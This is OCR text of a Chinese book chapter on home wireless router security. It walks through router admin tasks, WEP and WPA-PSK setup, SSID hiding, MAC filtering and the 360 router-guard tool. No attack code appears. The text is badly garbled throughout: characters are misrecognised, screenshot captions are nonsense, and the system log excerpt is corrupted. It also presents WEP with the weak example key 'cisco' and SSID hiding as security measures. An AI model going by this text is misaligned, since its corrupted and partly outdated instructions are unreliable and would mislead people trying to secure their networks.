当前 软件 版 本 : 
当前 硬件 版 本 : 


注意 : 请 使 用 有 线 LA 口 连接 进行 软件 升级 。 升 织 时 请 选择 与 当前 硬件 版 本 
一 致 的 软件 。 升 级 过 程 不 能 关闭 路 由 避 电 源 ， 否 则 将 寺 孜 路 由 絮 损坏 而 无 法 
使 用 。 升 级 过 程 约 40 秒 ， 当 升级 结束 后 ， 路 由 器 将 会 自动 重新 启动 。 


全 注意 : 请 使 用 有 线 LAN 口 连接 进行 软件 


升级 。 升 级 时 请 选择 与 当前 硬件 版 本 一 臻 
的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 
否则 将 导致 路 由 器 损坏 而 无 法 使 用 。 升 级 
过 程 约 40s， 当 升级 结束 后 ， 路 由 器 将 会 自 
动 重 新 启动 。 

选择 “恢复 出 厂 设 置 ” 选项 ， 在 打开 
的 界面 中 单 击 “ 恢 复出 厂 设 置 ?” 按钮 ， 可 
以 将 路 由 器 的 所 有 设置 恢复 到 出 厂 时 的 默 
认 状 态 ， 如 下 图 所 示 。 


恢复 出 厂 设置 
单 击 此 按 馆 将 使 路 由 口 的 所 有 设置 恢复 到 出 厂 时 的 默认 状态 。 
恢复 出 厂 设置 
帮助 


选择 “备份 和 载 入 配置 文件 ”选项 ， 
在 打开 的 界面 中 可 以 保存 当前 路 由 器 的 设 
置 。 建 议 在 修改 配置 及 升级 软件 前 备份 当前 
的 配置 文件 ， 当 然 也 可 以 通过 选择 备份 的 配 
置 文件 恢复 之 前 的 配置 ， 如 下 图 所 示 。 


虱 份 和 载 入 配置 文件 


您 可 以 在 这 保存 您 的 设置 。 我 们 建议 您 在 修改 配置 及 升级 软件 前 备份 您 的 本 
置 文件 。 


备份 配置 文件 
您 可 以 通过 载 入 配置 文件 来 恢复 您 的 设置 。 
路 径 : [| 选择 文件 | 未 选择 任何 文件 | [ 载 入 醒 时 文件 


注意 ; 1， 导入 配置 文件 后 ， 设 备 中原 有 的 用 户 配置 将 会 去 失 。 如 果 您 载 
入 的 枉 置 文件 有 误 ， 可 能 会 导致 设备 无 法 被 管理 。 
2， 载 入 配置 文件 的 过 程 不 能 关闭 路 由 器 电源 ， 否 则 将 号 私 路 由 咽 
损坏 而 无 法 使 用 。 载 入 过 程 约 20 秒 ， 当 载 入 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 


选择 “重启 路 由 ”选项 ， 在 打开 的 界 
面 中 单 击 “ 重 启 路 由 器 ”按钮 ， 可 以 重新 
启动 路 由 器 ， 如 下 图 所 示 。 


2 


重启 路 由 器 
单 击 此 按钮 将 使 路 由 器 重新 启动 。 


重启 路 由 器 
帮助 


[step 国 选择 “修改 登录 口令 ”选项 ， 在 打开 
的 界面 中 可 以 修改 系统 管理 员 的 用 户 名 与 
口令 ， 建 议 配置 完 路 由 器 后 重新 设置 管理 
员 的 账号 客 码 ， 防 止 黑客 使 用 弱 口 令 登 录 
路 由 ， 如 下 图 所 示 。 


本 页 修改 系统 管理 员 的 用 户 名 及 口令 ， 用 户 名 及 口令 长 度 不 能 超过 14 个 字 
Tie 

原 用 户 名 : 

原 口令 ; 

新 用 户 名 : 

新 口令 ; 

确认 新 口令 : 


选择 “系统 日 志 ” 选 项 ， 在 打开 的 
界面 中 可 以 查看 系统 日 志 ， 其 中 包括 管理 
员 登 录 信息 、 路 由 健康 状态 等 。 如 果 路 由 
器 被 非法 修改 ， 可 以 通过 日 志 查 看 进行 排 
除 ， 如 下 图 所 示 。 


索引 Sj 3 2) i 
IHFD 2006-01-0L 06:00:00 | 系统 启动 成 只 


INFD 2006-01-0! 06:00:08 |IHCF client tx discover [了 

INFD 2006-01-0! 08:00:51 |IHCPS: 1:0x0087362f9D4b，NAK in reguest. 
四 INHFD 2006-01-0! 08:00:51 |IDHCPS: 1:0d087362fd9D4b，192.168.1. 10D，ACE in request. 
:|2013-06-05 19:03:37 T2843< | 人 ssartion failad: 0, file .. /Jmao/ath dov/ath timar.o, lina 32 
:(|2013-06-20 4:18:48 13970s| 

b Load Fxcaptiorn 
coepti on Progran Counter: OxBO1di4c0 

tatus Hegistar ”DODnnfiaDl 

ause Resister: 0xDDD00008 
Aceoxsx Kdcrosr :DOD000014 

ask: 0xaoffatan “tHostapd” 
:|2013-11-18 0:10:13 275422=| 

b Load Fxcaption 
Exception Progran Counter: DxBOldf4cc 
Etatus Baslstar: Doo0idDl 

ause Eezister. 0xDDD00005 

coess Address : CD000014 


: (|2014-02-20 19:06:35 12224s| 
b Load Fxoapti aor, 
Exception Frogran Counter: OxBO]df4ce 
ezlster: DOxD00f301 


star: Ox00000008 
Access Address DOD00001d4 
aclt: Dxa0ffBacd) “tHostapd” 


Tins = 2006-01-D1 8:09:02 bd4is 

-Yer = NRG45N 2.0 00000000 : S-Ver = 4.19. 16 Puild 130123 Rel. S2379n 

L = 192.168.1.1 : N= 25. 266.255.0 

VL = DEE :=0.000: =.0: = 0.0.0D 

Free=5026, Jusy=2, Bind<0, Inrv=0/10, Be=0/D, Dns=248, ol=1536, fo<0/0, :oO0 


[ 列 新 ] [ 尘 新 | 有 已 志 | 
[step 图 选择 “流量 统计 ”选项 ， 在 打开 的 界 
面 中 可 以 分 别 对 路 由 器 总 的 数据 流量 以 及 
最 近 10s 内 的 数据 流量 进行 统计 。 默 认 情 况 
是 关闭 的 ， 如 有 需要 可 以 打开 。 在 网 络 遭 
受 攻 击 时 ， 通 过 数据 流量 的 分 析 对 找 出 攻 


击 主机 也 是 非常 有 帮助 的 ， 如 下 图 所 示 。 


本 页 分 别 对 路 由 说 总 的 数据 沉重 以 及 虹 近 10 秒 串 内 的 款 据 党 旦 进行 了 绞 计 。 
当前 流星 统计 状态 : 已 关闭 开启 过量 时 和 
数据 记 匀 计 时 间 i 闻 PP 届 : 15~60] 种 


控 IF 地 排序 T 自动 别 新 刷新 


ET | 


每 员 8 示 [5 了] 行 [上 页 | [下 = 页 | 当 肖 第 [ ] 页 


无 线路 由 各 的 安全 策略 


无 线路 由 器 本 映 目 带 有 安全 设置 选 
项 ， 通 过 设置 这 些 安全 选项 ， 可 以 提高 
无 线路 由 器 的 安全 性 能 ， 从 而 不 受 黑 客 
攻击 。 


13.2.1 设置 复杂 的 管理 员 密 码 


路 由 器 的 初始 密码 比较 简单 ， 为 了 保 
证 局 域 网 的 安全 ， 一 般 需 要 修改 或 设置 管 
理 员 密码 ， 有 具体 的 操作 步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设 置 界 面 ， 
选择 “系统 工具 ”选项 下 的 “修改 登录 窗 
码 ” 选 项 ， 打 开 “ 修 改 管 理 员 密码 ”工作 
界面 ， 如 下 图 所 示 。 


13.2 


加 TL-WR885N X PE 


一 口 
二 由 | 192.168.01 六 | 三 A … 


[step 图 在“ 原 密 码 ” 文 本 框 中 输入 原来 的 
pape 在 “新 密码 ”和 “确认 新 密码 ” 文 
本 框 中 输入 新 设置 的 密码 ， 最 后 单 击 “ 保 
存 ” 按 钮 即 可 ， 如 下 图 所 示 。 


四 TL-WR885N xX BE 


二 已 


| 192.168.0.1 


本 而 修 必 系统 它 理 后 密码 ,长 弃 为 6-15 位 。 
原审 取 : [ 志 志 而 志 直击 | 
RS | 间 埋 章鱼 章 击 
商 让 Si 宇 加 : 。。[ 间 吾 事 事 事 蝇 | “| 


13.2.2 无 线 网 络 WEP 加 密 

WEP 采 用 对 称 加 密 机 理 ， 数 据 的 加 密 
和 解密 采用 相同 的 密 钥 和 加 密 算 法 。 下 面 
详细 介绍 无 线 网 络 WEP 加 密 的 具体 方法 。 


1. 设置 无 线路 由 器 WEP 加 密 数 据 


打开 路 由 器 的 Web 后 台 设 置 界面 ， 单 击 
左 侧 “无 线 参 数 ” 一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 菜 单 中 选择 WEP 选 项 ， 在 “ 密 
钥 格式 选择 ”下 拉 菜 单 中 选择 “ASC II 
码 ” 选 项 。 设 置 密 钥 ， 在 “ 密 钥 1” 后 面 
的 “ 密 钥 类 型 ”下 拉 列 表 中 选择 “64 位 ” 
选项 ， 在 “ 密 钥 内 容 ” 文 本 框 中 输入 要 使 
用 的 密码 ， 本 实例 输入 密码 为 cisco， 单 击 
“保存 ”按钮 ， 如 下 图 所 示 。 


安全 提示 :为 保障 网 络 安全 ， 强 列 推荐 开启 安全 设置 ， 并 使 用 
WPA-PSK/WPA2-PSK AES 加 密 方法 。 


[开启 安全 设置 

安全 类 型 : WEP 加 
安全 选项 : 自动 选择 = 

密 钥 格式 选择 : [scrI 码 =| 


选择 64 位 密 钥 需 输入 16 进 制 数字 符 10 个 ， 或 者 ASCII 
码 字 符 5 个 。 选 择 128 位 密 角 需 输 入 16 进 制 数 字符 26 


密友 长 度 山中: 个 ， 或 者 ASCII 码 字符 1 个。 选择 152 位 密 胃 短 输 入 18 
进 制 数字 符 32 个 ， 或 者 ASCII 码 字符 16 个 。 
密 负 选择 | 密 角 内容 密 钥 类 型 
| 密 钥 1: 全 leised] | ER 
| 证 29 | | | [ 钱 司 
| ge |[ | | 用 用 可 
| 密 胃 4:@ | | | 村 司 
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2. 客户 端 连 接 
需要 WEP 加 密 认 证 的 无 线 客户 端 连接 
的 具体 操作 步骤 。 


单 击 系统 桌面 右 下 角 辆 图 标 ， 无 线 
客户 端 自动 扫描 到 附近 区 域内 的 所 有 无 线 
信号 ， 如 下 图 所 示 。 


三 未 识别 的 网 络 
无 Internet 访问 


tp-link 


右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 
中 选择 “连接 ”选项 ， 如 下 图 所 示 。 
i ”> 


二 == 未 识别 的 网 络 
T 了 无 Internet 访问 


tp-link 过 后 | 
s 


TP-LINK_SW 


弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 cisco， 单 去 
“确定 ”按钮 ， 如 下 图 所 示 。 


FO 
一 
C3r 


键入 网 络 安全 密 钥 


安全 亦 洞 [S): 


[sp 加 单 击 系统 桌面 右 下 角 贺 图标， 将 鼠标 
放 在 tp-link 选 项 上 ， 可 以 看 到 无 线 信 号 的 连 
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接 情况 。 下 图 所 示 表 明 已 经 成 功 连接 无 线 
路 由 器 。 


当前 连接 导 ; 
< tp-link 
I 了》 无 Internet 访问 


二 = 未 识别 的 网 络 
Yr 无 Internet 访问 


无 线 网 络 连 接 


tp-link 


tzgs 


SSID: tp-link 


打开 网 阁 和 共享 中 心 


13.2.3 ” WPA-PSK 安 全 加 密 算 法 


WPA-PSK 可 以 看 成 是 一 个 认证 机 制 ， 
只 要 求 一 个 单一 的 密码 进入 每 个 无 线 局 域 
网 节点 〈 如 无 线路 由 器 ) ， 只 要 密码 正确 ， 
就 可 以 使 用 无 线 网 络 。 下 面 介绍 如 何 使 用 
WPA-PSK 或 者 WPA2-PSK 加 密 无 线 网 络 。 


1. 设置 无 线路 由 器 WPA-PSK 安 全 加 密 
数据 


打开 路 由 器 的 Web 后 台 设 置 界面 ， 选 
择 左 侧 “ 无 线 参数 ”一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 列 表 中 选择 “WPA-PSK/WAP?2- 
PSK” 选 项 ， 在 “安全 选项 ”和 “加 密 方 
法 ”下 拉 菜 单 中 均 选择 “自动 选择 ”选项 ， 
在 “PSK 密 码 ” 文 本 框 中 输入 加 密 密 码 ， 本 
实例 设置 密码 为 sushi1986， 如 下 图 所 示 。 


[开启 无 线 功能 
聊 多 许 SSID 广 播 


三 开启 Bridge 功 能 
安全 提示 :为 保障 网 络 安 全 ， 强 烈 推荐 开启 安全 设置 ， 并 使 用 
WPA-PSK/WPA2~PSK AES 加 密 方法 。 


[开启 安全 设置 

安全 类 型 : [EAISKAWPA2-FSK 习 ] 

安全 选项 : [自动 选择 司 

加 密 方法 : [自动 选择 到 

PSk 密 码 : 最 短 为 8 个 字符 ， 最 长 为 63 个 字符 


sushi1986 


组 密 钥 更 新 周期 : 人 单位 为 秒 , 最 小 值 为 30, 不 更 新 则 为 0) 


[保存 ] [ 帮 即 | 


单 击 “ 保 存 ” 按 钮 ， 在 弹出 的 提示 对 


话 框 中 单 击 “ 确 定 ” 按 钮 ， 重 新 启动 路 由 
器 即 可 ， 如 下 图 所 示 。 


192.168.1.1 上 的 网 页 显示 : 


奉 认 重新 富 动 路 白 刁 ? 


区 -到了 区 本 


2. 使 用 WPA-PSK 安 全 加 密 认 证 的 无 线 
客户 端 。 


单 击 系统 桌面 右 下 角 圆 图标， 无 线 客 
户 端 会 自动 扫描 区 域内 的 无 线 信号 ， 如 下 
图 所 示 。 


当前 连接 到 : 
| “全 未 识别 的 网 给 
无 Internet 访问 


tp-link 


右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 中 
选择 “连接 ”菜单 命令 ， 如 下 图 所 示 。 

当前 连接 到 : 

户 Einemetw 


无 绪 网 络 连 接 


tp-link 连接 | , 


TP-LINK_SW 


打开 网 络 和 共享 中 心 


弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 sushi1986， 单 去 
“确定 ”按钮 ， 如 下 图 所 示 。 
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键入 网 络 安全 密 钥 


安全 老 铀 (9): sushi1986 
| 隐藏 字符 (H) 


[sep 四 单 击 系统 桌面 右 下 角 贺 图 标 ， 将 鼠标 
放 在 tp-link 信 号 上 ， 可 以 看 到 无 线 信号 的 连 
接 情 况 。 下 图 所 示 表 明 已 经 成 功 连接 无 线 
路 由 器 。 


当前 连接 旨 : 
< tp-link 
Internet 访问 
一 未 识 列 的 网 络 
无 Internet 访问 
元 竺 网 络 连 接 
tp-link 
名 称 : tp-link 
信号 强度 : 非常 好 
安全 类 型 : WPA2-PSK 的 


无 线 电 类 型 : 802.119 | ， 
TP-INK SW |¢sID: tp-link 


全 提示 : 在 WPA-PSK 加 密 算 法 的 使 用 过 程 
中 ， 密 码 设 置 应 该 尽 可 能 复杂 ， 并 且 要 注 
意 定 期 更 改 笑 码 。 


13.2.4 茶 用 99ID 厂 播 


SSID 就 是 一 个 无 线 网 络 的 名 称 ， 无 线 
客户 端 通过 无 线 网 络 的 SSID 来 区 分 不 同 的 
无 线 网 路 。 为 了 安全 起 见 ， 往 往 要 求 无 线 
AP 禁止 广播 该 SSID， 只 有 知道 该 无 线 网 络 
SSID 的 人 员 才 可 以 进行 无 线 网 络 连接 ， 禁 
用 SSID 广 播 的 具体 操作 步骤 如 下 。 


1. 设置 无 线路 由 器 禁用 SSID 广 播 


无 线路 由 器 禁用 SSID 广 播 的 具体 操作 
步骤 如 下 。 
[sep 国 打开 路 由 器 的 Web 后 台 设 置 界面 ， 设 
置 无 线 网 络 的 SSID 信 息 ， 取 消 选 中 “允许 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


SSID 广 播 ?” 复 选 框 ， 单 击 “ 保 存 ” 按 钮 ， 右 击 “其 他 网 络 ” 和 选项， 在 弹出 的 快 


如 下 图 所 示 。 捷 菜 单 中 选择 “连接 ”选项 ， 如 下 图 所 示 。 
Ee 

本 页 面 设置 障 由 器 元 线 网 络 的 基本 苦 数 和 安全 认证 选项 。 三: 未 识别 的 网 络 

sms enim 

频 段 : [自动 选择 悦 无 线 网 络 连 接 

模式 : [SaMbps (802. 11e) =| | 


区 开启 无 线 功能 
三 允许 SSID 广 播 


厂 开户 Bridge 功 能 
安全 提示 :为 保障 网 络 安 全 ， 强 烈 推荐 开启 安全 设置 ， 并 使 用 
WPA-PSK/WPA2-PSK AS 加 空 方 法 。 

| 开启 安全 设置 
安全 类 型 : [WPA-PSK/WPA2-PSK "| 
安全 选 项 : [自动 选择 "| 


弹出 一 个 提示 对 话 框 ， 单 击 “ 确 定 ” 

按钮 ， 重新 启动 路 由 器 ， 如 下 图 所 示 。 a 

192.168.1.1 上 的 网 页 显示 : 和 于 基因 网 车， met 
称 ” 文 本 框 中 输入 要 连接 网 络 的 SSID 号 ， 

ii 本 实例 输入 ssh， 单 击 “ 确 定 ” 按 钮 ， 如 下 


图 所 示 。 


| 


2 安 户 端 连 接 键入 网 络 的 名 称 (SSID) 
禁用 SSID 广 播 的 无 线 客 户 端 连接 的 有 具 

体操 作 步 又 如 下 。 
[See 国 单 去 系统 桌面 右 下 角 加 图 标 ， 会 看 到 
无 线 客 户 端 自动 扫描 到 区 域内 的 所 有 无 线 
信号 ， 会 发 现 其 中 没有 SSID 为 ssh 的 无 线 网 
络 ， 但 是 会 出 现 一 个 名 称 为 “其 他 网 络 ” ， [step 图 在 “安全 密 钥 ”文本 框 中 输入 无 线 网 
的 选项 ， 如 下 图 所 示 。 络 的 密 钥 ， 本 实例 输入 密 钥 sushi1986， 单 
击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 


名 称 (A): ssh 


当前 连接 到 : 


未 识别 的 网 络 
无 Internet 访问 


i 键入 网 络 安全 密 钥 
| 无 线 网 络 连接 


tzgs 安全 密 铜 (S): sushi1986 


[| 隐藏 字 符 (H) 


204 
SW-IT 
TP-LINK_SW 


其 他 网 络 


[steep 轿 单 击 系统 桌面 右 下 角 团 图 标 ， 将 挟 
标 放 在 ssh 选 项 上 可 以 看 到 无 线 网 络 的 连接 
情况 。 下 图 所 示 表 明 无 线 客户 端 已 经 成 功 
连接 到 无 线路 由 器 ， 如 下 图 所 示 。 


打开 网 络 和 共享 中 心 
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| 当前 连接 到 


举 ==。 未 识别 的 网 结 
™Y™ 无 Internet 访问 


:sh 
& Internet 访问 


无 线 电 类 型 : 802.119 
CMCd ccID: ssh 


13.2.5 ”媒体 访问 控制 (MAC) 地 址 过 滤 


网 络 管理 的 主要 任务 之 一 就 是 控制 客 
户 端 对 网 络 的 接 入 和 对 客户 端的 上 网 行为 
进行 控制 ， 无 线 网 络 也 不 例外 ， 通 第 无 线 
AP 利用 媒体 访问 控制 (MAC) 地 址 过 滤 的 
方法 来 限制 无 线 客户 端的 接 入 。 

使 用 无 线路 由 器 进行 MAC 地 址 过 滤 的 
具体 操作 步骤 如 下 。 

[step 图 打开 路 由 器 的 Web 后 台 设置 界面 ， 单 
击 左 侧 “ 无 线 参 数 ” 一 “无 线 网 络 MAC 地 
址 过 滤 设 置 ” 选 项 ， 默 认 情 况 MAC 地 址 过 
滤 功 能 是 关闭 状态 ， 单 击 “ 启 用 过 滤 ” 按 
钮 ， 开 启 MAC 地 址 过 滤 功 能 ， 单 击 “ 添 加 
新 条 目 ” 按 钮 ， 如 下 图 所 示 。 
无 线 网 络 由 5 地 址 过 滤 设 置 
本 页 设置 WAC 地址 过 滤 来 控制 计算 机 对 本 无 线 网 络 的 访问 。 


IC 地 址 过 源 功 能 : 
过 渗 规 则 
G 允许 列表 中 生效 规则 之 外 和 JnAC 地 址 访问 本 无 钱 网 络 
个 禁止 列表 中 生效 规则 之 外 和 AC 地 址 访问 本 无 线 网 络 
[状态 /类 型 
所 有 条 目 天 允 


打开 “无 线 网 络 MAC 地 址 过 滤 设 
置 ?” 对 话 框 ， 在 “MAC 地 址 ”文本 框 中 
输入 无 线 客户 端的 MAC 地 址 ， 本 实例 输 
入 MAC 地 址 为 00-0c-29-SA-3C-97， 在 “ 描 
述 ” 文 本 框 中 输入 MAC 描 述 信息 sushipc， 

在 “类 型 ”下 拉 列 表 中 选择 “允许 ” 选 
项 ， 在 “状态 ”下 拉 列 表 中 选择 “生效 ” 
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选项 ， 依 照 此 步骤 将 所 有 合法 的 无 线 客户 
端的 MAC 地 址 加 入 此 MAC 地 址 表 后 ， 单 去 
“保存 ”按钮 ， 如 下 图 所 示 。 
无 线 网 络 必 5 地 址 过 滤 设 置 
本 页 设置 必 5 地 址 过 滤 来 控制 计算 机 对 本 无 线 网 络 的 访问 。 


MaAc 地 址 : 


00-0C-29-5A-3C-97 
sushipe 


选择 “过 滤 规 则 ”选项 下 的 “禁止 ” 
单 选 框 ， 表 明 在 下 面 MAC 列 表 中 生效 规则 
之 外 的 MAC 地 址 不 可 以 访问 无 线 网 络 ， 如 


某 些 程序 需要 多 条 链接 :如 Internet 洲 戏 ， 视 频 会 说 ,网 络 电话 等 。 由 于 防火 墙 的 存在 ， 这 
些 程序 无 法 在 简单 的 NAT 路 由 下 工作 。 特 串 应 用 程序 使 得 其 此 这样 的 应 用 程序 能 9 在 HA 中 
由 下 工作 。 


[Tn | 锅 上 江口 | _ 触 迪 协议 


这 样 无 线 客户 端 在 访问 无 线 AP 时 ， 
会 发 现 除 了 MAC 地 址 表 中 的 MAC 地 址 之 
外 ， 其 他 的 MAC 地 址 无 法 再 访问 无 线 AP， 
也 就 无 法 访问 互联 网 。 


侠 所 有 条 目 失 效 | | 是 除 所 有 条 目 


13.3 ”无 线路 由 安全 管理 工具 


使 用 无 线路 由 管理 工具 可 以 方便 管理 


无 线 网 络 中 的 上 网 设备 ， 本 节 吏 来 介绍 两 
个 无 线路 由 安全 管理 工具 ， 包 括 360 路 由 器 
卫士 与 路 由 优化 大 师 。 


13.3.1 360 路 由 器 卫士 


360 路 由 器 卫士 是 一 款 由 360 官 方 推 
出 的 绿色 免费 的 家 庭 必 备 无 线 网 络 管理 工 
具 。360 路 由 器 卫士 软件 功能 强大 ， 支 持 几 
乎 所 有 的 路 由 器 。 在 管理 的 过 程 中 ， 一 且 
发 现 蹦 网 设备 想 踢 就 踢 。 下 面 介 绍 使 用 360 
路 由 器 卫士 管理 网 络 的 操作 方法 。 
下 载 并 安装 360 路 由 器 卫士 ， 双 击 桌 
面 上 的 快捷 图 标 ， 打 开 “ 路 由 器 卫士 ” 工 
作 界 面 ， 提 示 用 户 正 在 连接 路 由 ， 如 下 图 
所 示 。 


pn | 


~ 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


路 由 器 卫士 ”我 的 路 路 由 防 潜 路 由 路 分 扩展 工具 路 由 设置 
0 台 正 在 上 网 的 电脑 手机 ， 点 击 可 以 管理 上 网 速度 中 刷新 


[step 图 连接 成 功 后 ， 弹 出 “路 由 器 卫士 提醒 您 ”对 话 框 ， 在 其 中 输入 路 由 账号 与 密码 ， 如 


下 图 所 示 。 


请 输入 您 的 路 由 器 帐号 和 密码 
中 和 出 帐号 ;wimin 
路 由 密码 : eee 


[steep 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “我 的 路 由 ”工作 界面 ， 在 其 中 可 以 看 到 当前 的 在 线 设 
备 ， 如 下 图 所 示 。 


~» 


路 由 器 卫士 


王 名 单 [0) 


DESKTOP-67NQ... 2 


IP:192.168.0.105 


未 知 设备 之 EE 


IP:192,168.0,103 


未 知 设备 性 
IlP:192.166.0.107 


AFOIG-611211... 必 
IP:192.168.0.112 


如 果 想 要 对 某 个 设备 限 速 ， 则 可 以 单 击 设备 后 的 “ 限 速 ”按钮 ， 打 开 “ 限 速 ” 对 话 
框 ， 在 其 中 设置 设备 的 上 传 速度 与 下 载 速 度 ， 设 置 完成 后 单 击 “ 确 认 ” 按 钮 即 可 保存 设置 ， 
如 下 图 所 示 。 


6 mv 


0 去 示 不 限 速 ,最 高 限 速 10M 
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[step 园 在 管理 的 过 程 中 ， 一 旦 发 现 有 足 网 设备 ， 可 以 单 击 该 设备 后 的 “禁止 上 网 ”按钮 ， 
如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 黑 路 由 跑 分 扩展 工具 路 由 设置 


黑 名 单 (D) 到 
T L-W | ‘8865r 


AFOIG%2D6112... 2 人 23KB/s 
IP:192.168.0.112 i275KB/s 


AFOIG%2D7021.. 2 OKB/s - 
本 本 ee | 
%E7%BD%91%E7... 2 OKB/S = [UN 

422 KB 


1P:192.168.0.108 ,116KB/s 
前 网 速 


HUAWEI%SFMAI.. 2” OKB/s 


1P:19J Iptgtt: 192.168.0.103 KB/Ss 
MAC 地 址 : 84-BE-52-38-17-01 


[step 图 禁止 上 网 完成 后 ， 单 击 “ 黑 名 单 ” 选 项 卡 ， 进 入 “ 黑 名 单 ”设置 界面 ， 在 其 中 可 以 
看 到 被 禁止 的 上 网 设备 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 黑 。” 。” 踏 由 跑 分 扩展 工具 ”路 由 设置 


在 线 设 备 (5) 里 名 单 (1) 


HUAWEI%SFMAL... 之 
ER 局 


前 网 速 


选择 “路 由 防 黑 ”选项 卡 ， 进 入 “路 由 防 黑 ”设置 界面 ， 在 其 中 可 以 对 路 由 器 进行 
防 黑 检测 ， 如 下 图 所 示 。 


路 由 器 卫士 : 我 的 路 由 路 由 防 黑 。 。 路 由 跑 分 。 ”扩展 工具 


路 由 器 还 未 做 过 防 黑 检测 


多 路由 忠 DHCP 服 务 的 DNS 设 竺 行 检测 
全 DMZ 主 机 的 设 兰 行 检测 
生路 由 趾 “ 尼 运 饼 于 ” 远 持 本 润 情况 待 检测 | 
全 路 由 踢 管 理 密 公 强 度 待 榨 测 | 
全 WiFi 挛 码 如 安 方 式 待 检 测 | 
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[step 图 单 去 “立即 检测 ”按钮 ， 即 可 开始 对 路 由 器 进行 检测 ， 并 给 出 检测 结果 ， 如 下 图 
所 示 。 


2z.0 
路 由 器 卫士 我 的 路 由 路 由 防 黑 


您 的 路 由 器 能 抵御 黑客 入 侵 ， 请 放心 上 网 各 新 扫 笨 


四 DHCP 服 务 的 DNS 安 全 ,上 网 不 易 被 动 持 安全 
加 DMIZ 主 机 服务 关闭 ， 不 罚 波 轩 襄 深 纵 安全 
四 未 发 现 “ 厄 运 讲 干 ” 沽 洞 ,不易 被 畦 客 攻击 和 入 但 安全 
四 路 由 器 管理 挛 码 较为 安全 ,不易 被 黑客 入 侵 安全 
四 WiFi 密 码 如 密 方式 安全 ， 不 号 被 他 人 路 网 安全 


[Ge 国 选择 “路 由 哆 分 ”选项 卡 ， 进 入 “路 由 跑 分 ”设置 界面 ， 在 其 中 可 以 查看 当前 路 由 
器 信息 ， 如 下 图 所 示 。 


2 
路 由 器 卫士 我 的 路 由 


路 由 器 名 称 : TL-WR886N 处 理 器 架构 : MIPS 
处 理 器 型 号 : TP9343-AL3A 无 线 传输 速率 : 450 Mbps 
处 理 咽 品牌 : Qualcomm 内 存 : 16 MB 

处 理 嚣 主 频 : 750 MHz 闪存 : 2 MB 


step 加 单 去 “开始 跑 分 ”按钮 ， 即 可 开始 评估 当前 路 由 器 的 性 能 ， 如 下 图 所 示 。 


2.0 
路 由 器 卫士 我 的 路 由 路 由 防 黑 


正在 评估 路 由 器 性 能 


41% 


oe 
大 而 
9 
和 
0009 
和 
LA 
和 看 二 
LEEREE 
RALE 
和 

区 
S099 
和 
ELLE 
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评估 完成 后 ， 会 在 “路 由 跑 分 ”界面 中 给 出 跑 分 排行 榜 信息 ， 如 下 图 所 示 。 


效 由 跑 分 扩展 [ 具 路 由 设置 


路 由 器 卫士 ” 找 和 路 由 路 由 防 更 


您 的 路 由 器 得 分 5805 分 ， 全 国 排名 103692 名 ， 击 败 了 全 国 63% 的 路 由 器 | 


路 由 跑 分 排行 


WSs325 HUAWEI MODEL 
RTL wresen 上 DR 
En me-706 EEE 
TP-LINK TL-WR885N 1.0 
HG532E HUAWEI MODEL 
TP-LINK TL-WR840N 3.0 
D-LINK DIR-600M 1 EO 


FIR300M B77 


选择 “路 由 设置 ”选项 卡 ， 进 入 “路 由 设置 ”界面 ， 在 其 中 可 以 对 宽带 上 网 、WiFi 
密码 、 路 由 器 密码 等 选项 进行 设置 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 累 路 由 跑 分 扩展 工具 


人 ia ) 区 上 网 全 wifi 可 玛 。。 【  ) 路 由 各 宪 码 < 卫 启 路 由 吕 


路 由 时 光 机 可 以 帮 您 保存 上 网 帐号 和 密码 永 个 去 先 


并 带 上 网 帐号 ， 可 以 攻 和 您 立即 找 回 


‘起 记 


' 更 换 新 的 路 由 器 后 ， 能 够 言 浸 畅快 上 网 
. 1024 位 RSA 及 128 位 AES 加 旋 ， 帐 号 永 不 壬 


路 由 时 ;机 


选择 “路 由 时 光 机 ”选项 卡 ， 在 打开 的 界面 中 单 击 “立即 开 居 ” 按 钮 ， 即 可 打开 登 
录 界 面 ， 在 其 中 输入 360 账 号 与 密码 ， 然 后 单 击 “ 立 即 登 录 并 开启 ”按钮 ， 即 可 开启 时 光 


机 ， 如 下 图 所 示 。 


登录 您 的 360 手 机 账号 即 可 开局 时 光 机 


您 的 360 手 机 账号 就 是 时 光 机 账号 


账号 : 


\ 写 1 


密码 : ”| 密码 (6-20 个 字符 区 分 大 小 写 


忘记 密码 ”立即 注册 


step 本 选择 “宽带 上 网 ”选项 卡 ， 进 入 “宽带 上 网 ”界面 ， 在 其 中 输入 网 络 运 营 商 给 出 的 
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二 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈《 超 值 版 ) 


上 网 账号 与 密码 ， 单 击 “ 保 存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 时 路 由 跑 分 

dm wim © 之 带 上 网 一 WiF 密 码 ( 2 )】 路由 器 客 码 > <” 到 局 路 由 中 
庄 输 入 完 带 运 莒 商 给 您 的 宽带 上 网 帐号 及 裤 码 ， 如 时 忘记 了 
可 俩 搞 素 市 五 安 页 攻 加 | 
上 网 万 式 : | PPPoE v 


CH .i 


上 网 安 铝 eeeeeeeee 


选择 “WiFi 密 码 ” 选 项 卡 ， 进 入 “WiFi 密 码 ” 界 面 ， 在 其 中 输入 WiFi 密 码 ， 单 击 
“保存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 黑 路 由 跑 分 
